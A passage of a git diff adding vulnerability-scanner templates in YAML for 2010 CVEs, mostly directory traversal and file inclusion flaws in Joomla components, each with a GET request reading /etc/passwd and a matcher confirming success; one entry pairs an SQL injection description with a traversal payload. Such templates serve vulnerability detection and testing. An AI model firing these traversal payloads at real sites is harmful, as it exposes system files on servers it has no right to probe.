the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + reference: + - https://www.exploit-db.com/exploits/10943 + - https://www.cvedetails.com/cve/CVE-2010-0157 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml new file mode 100644 index 0000000000..6bb7060bae --- /dev/null +++ b/cves/2010/CVE-2010-0467.yaml @@ -0,0 +1,32 @@ +id: CVE-2010-0467 + +info: + name: Joomla! Component CCNewsLetter - Local File Inclusion + author: daffainfo + severity: medium + description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + reference: | + - https://www.exploit-db.com/exploits/11282 + - https://www.cvedetails.com/cve/CVE-2010-0467 + tags: cve,cve2010,joomla,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.80 + cve-id: CVE-2010-0467 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml new file mode 100644 index 0000000000..66f1da7c88 --- /dev/null +++ b/cves/2010/CVE-2010-0696.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0696 + +info: + name: Joomla! Component Jw_allVideos - Arbitrary File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/11447 + - https://www.cvedetails.com/cve/CVE-2010-0696 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0759.yaml b/cves/2010/CVE-2010-0759.yaml new file mode 100644 index 0000000000..93c80ee785 --- /dev/null +++ b/cves/2010/CVE-2010-0759.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0759 + +info: + name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + reference: + - https://www.exploit-db.com/exploits/11498 + - https://www.cvedetails.com/cve/CVE-2010-0759 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0942.yaml b/cves/2010/CVE-2010-0942.yaml new file mode 100644 index 0000000000..f5d69afbca --- /dev/null +++ b/cves/2010/CVE-2010-0942.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0942 + +info: + name: Joomla! Component com_jvideodirect - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11089 + - https://www.cvedetails.com/cve/CVE-2010-0942 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0972.yaml b/cves/2010/CVE-2010-0972.yaml new file mode 100644 index 0000000000..10db45dc6c --- /dev/null +++ b/cves/2010/CVE-2010-0972.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0972 + +info: + name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11738 + - https://www.cvedetails.com/cve/CVE-2010-0972 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0982.yaml b/cves/2010/CVE-2010-0982.yaml new file mode 100644 index 0000000000..9fa799d4c8 --- /dev/null +++ b/cves/2010/CVE-2010-0982.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0982 + +info: + name: Joomla! Component com_cartweberp - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10942 + - https://www.cvedetails.com/cve/CVE-2010-0982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1056.yaml b/cves/2010/CVE-2010-1056.yaml new file mode 100644 index 0000000000..2049880870 --- /dev/null +++ b/cves/2010/CVE-2010-1056.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1056 + +info: + name: Joomla! Component com_rokdownloads - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11760 + - https://www.cvedetails.com/cve/CVE-2010-1056 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1081.yaml b/cves/2010/CVE-2010-1081.yaml new file mode 100644 index 0000000000..39650b4327 --- /dev/null +++ b/cves/2010/CVE-2010-1081.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1081 + +info: + name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11511 + - https://www.cvedetails.com/cve/CVE-2010-1081 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1217.yaml b/cves/2010/CVE-2010-1217.yaml new file mode 100644 index 0000000000..45872b620b --- /dev/null +++ b/cves/2010/CVE-2010-1217.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1217 + +info: + name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + reference: + - https://www.exploit-db.com/exploits/11814 + - https://www.cvedetails.com/cve/CVE-2010-1217 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml new file mode 100644 index 0000000000..8bf459dd68 --- /dev/null +++ b/cves/2010/CVE-2010-1302.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1302 + +info: + name: Joomla! Component DW Graph - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11978 + - https://www.cvedetails.com/cve/CVE-2010-1302 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml new file mode 100644 index 0000000000..d369a9ddb3 --- /dev/null +++ b/cves/2010/CVE-2010-1340.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1340 + +info: + name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/33797 + - https://www.cvedetails.com/cve/CVE-2010-1340 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml new file mode 100644 index 0000000000..13660c3ae8 --- /dev/null +++ b/cves/2010/CVE-2010-1461.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1461 + +info: + name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12232 + - https://www.cvedetails.com/cve/CVE-2010-1461 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml new file mode 100644 index 0000000000..d06c195c18 --- /dev/null +++ b/cves/2010/CVE-2010-1469.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1469 + +info: + name: Joomla! Component JProject Manager 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12146 + - https://www.cvedetails.com/cve/CVE-2010-1469 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml new file mode 100644 index 0000000000..850f9aa938 --- /dev/null +++ b/cves/2010/CVE-2010-1478.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1478 + +info: + name: Joomla! Component Jfeedback 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12145 + - https://www.cvedetails.com/cve/CVE-2010-1478 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml new file mode 100644 index 0000000000..865fd5f04f --- /dev/null +++ b/cves/2010/CVE-2010-1491.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1491 + +info: + name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12318 + - https://www.cvedetails.com/cve/CVE-2010-1491 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml new file mode 100644 index 0000000000..b0afe05f6e --- /dev/null +++ b/cves/2010/CVE-2010-1540.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1540 + +info: + name: Joomla! Component com_blog - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: | + - https://www.exploit-db.com/exploits/11625 + - https://www.cvedetails.com/cve/CVE-2010-1540 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml new file mode 100644 index 0000000000..dc2b52c09b --- /dev/null +++ b/cves/2010/CVE-2010-1603.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1603 + +info: + name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12284 + - https://www.cvedetails.com/cve/CVE-2010-1603 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml new file mode 100644 index 0000000000..fdc3e5d2a7 --- /dev/null +++ b/cves/2010/CVE-2010-1653.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1653 + +info: + name: Joomla! Component Graphics 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + reference: + - https://www.exploit-db.com/exploits/12430 + - https://www.cvedetails.com/cve/CVE-2010-1653 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml new file mode 100644 index 0000000000..1996fbeb69 --- /dev/null +++ b/cves/2010/CVE-2010-1658.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1658 + +info: + name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12427 + - https://www.cvedetails.com/cve/CVE-2010-1658 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml new file mode 100644 index 0000000000..6eabdff378 --- /dev/null +++ b/cves/2010/CVE-2010-1715.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1715 + +info: + name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + reference: + - https://www.exploit-db.com/exploits/12174 + - https://www.cvedetails.com/cve/CVE-2010-1715 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/cves/2010/CVE-2010-1870.yaml similarity index 60% rename from vulnerabilities/lsoft/listserv_maestro_rce.yaml rename to cves/2010/CVE-2010-1870.yaml index 56b6d5f00f..75e15e4977 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/cves/2010/CVE-2010-1870.yaml @@ -1,14 +1,19 @@ -id: maestro-unauth-rce +id: CVE-2010-1870 info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd severity: info - description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - tags: rce,listserv,ognl + tags: rce,listserv,ognl,cves,cve2010 + classification: + cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5.0 + cve-id: CVE-2010-1870 + cwe-id: CWE-917 requests: - method: GET @@ -22,4 +27,4 @@ requests: - 'LISTSERV Maestro\s+9\.0-[123456780]' - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - - 'Administration Hub [5678]' \ No newline at end of file + - 'Administration Hub [5678]' diff --git a/cves/2010/CVE-2010-1873.yaml b/cves/2010/CVE-2010-1873.yaml new file mode 100644 index 0000000000..4331b8702c --- /dev/null +++ b/cves/2010/CVE-2010-1873.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1873 + +info: + name: Joomla! Component Jvehicles - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. + reference: + - https://www.exploit-db.com/exploits/11997 + - https://www.cvedetails.com/cve/CVE-2010-1873 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml new file mode 100644 index 0000000000..551f28d4a6 --- /dev/null +++ b/cves/2010/CVE-2010-1878.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1878 + +info: + name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12317 + - https://www.cvedetails.com/cve/CVE-2010-1878 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1977.yaml b/cves/2010/CVE-2010-1977.yaml new file mode 100644 index 0000000000..71de2a9492 --- /dev/null +++ b/cves/2010/CVE-2010-1977.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1977 + +info: + name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12083 + - https://www.cvedetails.com/cve/CVE-2010-1977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1982.yaml b/cves/2010/CVE-2010-1982.yaml new file mode 100644 index 0000000000..f58840909d --- /dev/null +++ b/cves/2010/CVE-2010-1982.yaml @@ -0,0 +1,26 @@ +id: CVE-2010-1982 +info: + name: Joomla! Component JA Voice 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12121 + - https://www.cvedetails.com/cve/CVE-2010-1982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2045.yaml b/cves/2010/CVE-2010-2045.yaml new file mode 100644 index 0000000000..b40cfaab94 --- /dev/null +++ b/cves/2010/CVE-2010-2045.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2045 + +info: + name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12595 + - https://www.cvedetails.com/cve/CVE-2010-2045 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2050.yaml b/cves/2010/CVE-2010-2050.yaml new file mode 100644 index 0000000000..9aedcbfc20 --- /dev/null +++ b/cves/2010/CVE-2010-2050.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2050 + +info: + name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12611 + - https://www.cvedetails.com/cve/CVE-2010-2050 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2128.yaml b/cves/2010/CVE-2010-2128.yaml new file mode 100644 index 0000000000..cf019f95a3 --- /dev/null +++ b/cves/2010/CVE-2010-2128.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2128 + +info: + name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12607 + - https://www.cvedetails.com/cve/CVE-2010-2128 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2507.yaml b/cves/2010/CVE-2010-2507.yaml new file mode 100644 index 0000000000..4ff7972b09 --- /dev/null +++ b/cves/2010/CVE-2010-2507.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2507 + +info: + name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/13981 + - https://www.cvedetails.com/cve/CVE-2010-2507 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2680.yaml b/cves/2010/CVE-2010-2680.yaml new file mode 100644 index 0000000000..fa1dc916da --- /dev/null +++ b/cves/2010/CVE-2010-2680.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2680 + +info: + name: Joomla! Component jesectionfinder - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14064 + - https://www.cvedetails.com/cve/CVE-2010-2680 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml new file mode 100644 index 0000000000..1478adabab --- /dev/null +++ b/cves/2010/CVE-2010-2857.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2857 + +info: + name: Joomla! Component Music Manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. + reference: | + - https://www.exploit-db.com/exploits/14274 + - https://www.cvedetails.com/cve/CVE-2010-2857 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git 